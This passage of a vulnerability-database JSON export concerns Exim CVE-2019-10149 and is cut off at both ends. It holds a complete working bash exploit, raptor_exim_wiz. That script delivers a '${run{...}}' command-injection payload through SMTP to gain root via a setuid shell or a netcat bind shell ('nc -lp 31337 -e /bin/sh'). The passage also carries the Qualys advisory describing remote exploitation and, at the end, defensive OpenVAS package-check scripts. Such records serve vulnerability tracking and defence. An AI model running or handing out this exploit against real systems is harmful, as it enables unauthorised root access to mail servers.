"2021-12-05T21:57:04", "id": "314FBFEA-2B26-54C6-BD8B-833438155879", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T13:02:24", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-27T01:34:41", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-11-08T19:51:27", "id": "910B7127-C06A-533E-BFC7-6ED36944EA87", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:37:43", "description": "# CVE-2019-10149\nCVE-2019-10149 : A flaw was found in Exim versi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-27T01:03:11", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-12-05T21:57:04", "id": "ADA0DDA5-BF6D-5656-87DA-B9E2BF0777ED", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-22T13:26:40", "description": "# PoC-CVE-2019-10149_Exim\nMNEMO-CERT ha desarrollado una PoC que...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-13T23:21:53", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-07-22T10:51:21", "id": "7DB4D6C1-099F-581F-8C39-DB454925C570", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:19:34", "description": "# StickyExim\n![](https://bretstaton.com/images/article_images/ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-07-25T00:46:37", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-12-05T21:57:04", "id": "7B7215E0-65A8-5ECC-B222-5204D0DE0ABF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T16:46:11", "description": "# eximrce\n\nSimple python socket connection to test if exim is vu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-12T03:47:16", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-12-15T14:36:31", "id": "53BB099A-E497-5170-9B4B-16FB5A78CF67", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:35", "description": "# Exim CVE Data Collection\n\nData Collection Related to Exim Vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-03T02:27:01", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15846", "CVE-2019-10149", "CVE-2019-16928"], "modified": "2020-10-20T13:48:44", "id": "E1FEC345-BB7E-5FFE-AD78-64A1B9E93172", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "exploitpack": [{"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.87 - 4.91 - Local Privilege Escalation", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-17T00:00:00", "type": "exploitpack", "title": "Exim 4.87 - 4.91 - Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T00:00:00", "id": "EXPLOITPACK:5F07E65256D3B05FE6074E80F7346498", "href": "", "sourceData": "#!/bin/bash\n\n#\n# raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit\n# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). \n# Improper validation of recipient address in deliver_message() \n# function in /src/deliver.c may lead to remote command execution.\n# (CVE-2019-10149)\n#\n# This is a local privilege escalation exploit for \"The Return \n# of the WIZard\" vulnerability reported by the Qualys Security \n# Advisory team.\n#\n# Credits:\n# Qualys Security Advisory team (kudos for your amazing research!)\n# Dennis 'dhn' Herrmann (/dev/tcp technique)\n#\n# Usage (setuid method):\n# $ id\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\n# $ ./raptor_exim_wiz -m setuid\n# Preparing setuid shell helper...\n# Delivering setuid payload...\n# [...]\n# Waiting 5 seconds...\n# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned\n# # id\n# uid=0(root) gid=0(root) groups=0(root)\n#\n# Usage (netcat method):\n# $ id\n# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]\n# $ ./raptor_exim_wiz -m netcat\n# Delivering netcat payload...\n# Waiting 5 seconds...\n# localhost [127.0.0.1] 31337 (?) open\n# id\n# uid=0(root) gid=0(root) groups=0(root)\n#\n# Vulnerable platforms:\n# Exim 4.87 - 4.91\n#\n# Tested against:\n# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]\n#\n\nMETHOD=\"setuid\" # default method\nPAYLOAD_SETUID='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22chown\\troot\\t\\x2ftmp\\x2fpwned\\x3bchmod\\t4755\\t\\x2ftmp\\x2fpwned\\x22}}@localhost'\nPAYLOAD_NETCAT='${run{\\x2fbin\\x2fsh\\t-c\\t\\x22nc\\t-lp\\t31337\\t-e\\t\\x2fbin\\x2fsh\\x22}}@localhost'\n\n# usage instructions\nfunction usage()\n{\n\techo \"$0 [-m METHOD]\"\n\techo\n\techo \"-m setuid : use the setuid payload (default)\"\n\techo \"-m netcat : use the netcat payload\"\n\techo\n\texit 1\n}\n\n# payload delivery\nfunction exploit()\n{\n\t# connect to localhost:25\n\texec 3<>/dev/tcp/localhost/25\n\n\t# deliver the payload\n\tread -u 3 && echo $REPLY\n\techo \"helo localhost\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"mail from:<>\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"rcpt to:<$PAYLOAD>\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"data\" >&3\n\tread -u 3 && echo $REPLY\n\tfor i in {1..31}\n\tdo\n\t\techo \"Received: $i\" >&3\n\tdone\n\techo \".\" >&3\n\tread -u 3 && echo $REPLY\n\techo \"quit\" >&3\n\tread -u 3 && echo $REPLY\n}\n\n# print banner\necho\necho 'raptor_exim_wiz - \"The Return of the WIZard\" LPE exploit'\necho 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'\necho\n\n# parse command line\nwhile [ ! -z \"$1\" ]; do\n\tcase $1 in\n\t\t-m) shift; METHOD=\"$1\"; shift;;\n\t\t* ) usage\n\t\t;;\n\tesac\ndone\nif [ -z $METHOD ]; then\n\tusage\nfi\n\n# setuid method\nif [ $METHOD = \"setuid\" ]; then\n\n\t# prepare a setuid shell helper to circumvent bash checks\n\techo \"Preparing setuid shell helper...\"\n\techo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >/tmp/pwned.c\n\tgcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null\n\tif [ $? -ne 0 ]; then\n\t\techo \"Problems compiling setuid shell helper, check your gcc.\"\n\t\techo \"Falling back to the /bin/sh method.\"\n\t\tcp /bin/sh /tmp/pwned\n\tfi\n\techo\n\n\t# select and deliver the payload\n\techo \"Delivering $METHOD payload...\"\n\tPAYLOAD=$PAYLOAD_SETUID\n\texploit\n\techo\n\n\t# wait for the magic to happen and spawn our shell\n\techo \"Waiting 5 seconds...\"\n\tsleep 5\n\tls -l /tmp/pwned\n\t/tmp/pwned\n\n# netcat method\nelif [ $METHOD = \"netcat\" ]; then\n\n\t# select and deliver the payload\n\techo \"Delivering $METHOD payload...\"\n\tPAYLOAD=$PAYLOAD_NETCAT\n\texploit\n\techo\n\n\t# wait for the magic to happen and spawn our shell\n\techo \"Waiting 5 seconds...\"\n\tsleep 5\n\tnc -v 127.0.0.1 31337\n\n# print help\nelse\n\tusage\nfi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:14", "description": "\nExim 4.87 4.91 - (Local Remote) Command Execution", "cvss3": {}, "published": "2019-06-05T00:00:00", "type": "exploitpack", "title": "Exim 4.87 4.91 - (Local Remote) Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149", "CVE-1999-0095", "CVE-1999-0145"], "modified": "2019-06-05T00:00:00", "id": "EXPLOITPACK:4FFD4258EB9240F56C83A57C965E0913", "href": "", "sourceData": "Qualys Security Advisory\n\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nLocal exploitation\nRemote exploitation\n- Non-default configurations\n- Default configuration\nAcknowledgments\nTimeline\n\n Boromir: \"What is this new devilry?\"\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\n -- The Lord of the Rings: The Fellowship of the Ring\n\n\n========================================================================\nSummary\n========================================================================\n\nDuring a code review of the latest changes in the Exim mail server\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\nRemote *Command* Execution, not Remote Code Execution: an attacker can\nexecute arbitrary commands with execv(), as root; no memory corruption\nor ROP (Return-Oriented Programming) is involved.\n\nThis vulnerability is exploitable instantly by a local attacker (and by\na remote attacker in certain non-default configurations). To remotely\nexploit this vulnerability in the default configuration, an attacker\nmust keep a connection to the vulnerable server open for 7 days (by\ntransmitting one byte every few minutes). However, because of the\nextreme complexity of Exim's code, we cannot guarantee that this\nexploitation method is unique; faster methods may exist.\n\nExim is vulnerable by default since version 4.87 (released on April 6,\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\n(released on February 10, 2019):\n\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\nhttps://bugs.exim.org/show_bug.cgi?id=2310\n\nbut was not identified as a security vulnerability, and most operating\nsystems are therefore affected. For example, we exploit an up-to-date\nDebian distribution (9.9) in this advisory.\n\n\n========================================================================\nLocal exploitation\n========================================================================\n\nThe vulnerable code is located in deliver_message():\n\n6122 #ifndef DISABLE_EVENT\n6123 if (process_recipients != RECIP_ACCEPT)\n6124 {\n6125 uschar * save_local = deliver_localpart;\n6126 const uschar * save_domain = deliver_domain;\n6127\n6128 deliver_localpart = expand_string(\n6129 string_sprintf(\"${local_part:%s}\", new->address));\n6130 deliver_domain = expand_string(\n6131 string_sprintf(\"${domain:%s}\", new->address));\n6132\n6133 (void) event_raise(event_action,\n6134 US\"msg:fail:internal\", new->message);\n6135\n6136 deliver_localpart = save_local;\n6137 deliver_domain = save_domain;\n6138 }\n6139 #endif\n\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\nexpansion item, and because new->address is the recipient of the mail\nthat is being delivered, a local attacker can simply send a mail to\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\nlocal_domains) and execute arbitrary commands, as root\n(deliver_drop_privilege is false, by default):\n\n[...]\n\n\n========================================================================\nRemote exploitation\n========================================================================\n\nOur local-exploitation method does not work remotely, because the\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\nconfiguration requires the local part of the recipient's address (the\npart that precedes the @ sign) to be the name of a local user:\n\n[...]\n\n------------------------------------------------------------------------\nNon-default configurations\n------------------------------------------------------------------------\n\nWe eventually devised an elaborate method for exploiting Exim remotely\nin its default configuration, but we first identified various\nnon-default configurations that are easy to exploit remotely:\n\n- If the \"verify = recipient\" ACL was removed manually by an\n administrator (maybe to prevent username enumeration via RCPT TO),\n then our local-exploitation method also works remotely.\n\n- If Exim was configured to recognize tags in the local part of the\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\n then a remote attacker can simply reuse our local-exploitation method\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\n name of a local user).\n\n- If Exim was configured to relay mail to a remote domain, as a\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\n (where \"khazad.dum\" is one of Exim's relay_to_domains). Indeed, the\n \"verify = recipient\" ACL can only check the domain part of a remote\n address (the part that follows the @ sign), not the local part.\n\n------------------------------------------------------------------------\nDefault configuration\n------------------------------------------------------------------------\n\n[...]\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank Exim's developers, Solar Designer, and the members of\ndistros@openwall.\n\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\nDEBUG vulnerabilities:\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\nhttps://seclists.org/bugtraq/1995/Feb/56\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\nhttp://www.cheswick.com/ches/papers/berferd.pdf\n\n\n========================================================================\nTimeline\n========================================================================\n\n2019-05-27: Advisory sent to security@exim.\n\n2019-05-28: Advisory sent to distros@openwall.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-06-07T14:49:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-06-06T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-4010-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-06T00:00:00", "id": "OPENVAS:1361412562310844043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844043", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844043\");\n script_version(\"2019-06-06T13:02:35+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-06 13:02:35 +0000 (Thu, 06 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-06 02:00:49 +0000 (Thu, 06 Jun 2019)\");\n script_name(\"Ubuntu Update for exim4 USN-4010-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU18\\.10)\");\n\n script_xref(name:\"USN\", value:\"4010-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-June/004942.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the USN-4010-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly handled certain decoding\noperations. A remote attacker could possibly use this issue to execute\narbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"'exim4' package(s) on Ubuntu 18.10, Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.90.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.90.1-1ubuntu1.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.91-6ubuntu1.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.91-6ubuntu1.1\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-07T14:49:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-06-06T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4456-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-06T00:00:00", "id": "OPENVAS:1361412562310704456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704456", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704456\");\n script_version(\"2019-06-06T02:00:08+0000\");\n script_cve_id(\"CVE-2019-10149\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-06 02:00:08 +0000 (Thu, 06 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-06 02:00:08 +0000 (Thu, 06 Jun 2019)\");\n script_name(\"Debian Security Advisory DSA 4456-1 (exim4 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4456.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4456-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the DSA-4456-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\");\n\n script_tag(name:\"affected\", value:\"'exim4' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\n\nWe recommend that you upgrade your exim4 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"exim4-dev\", 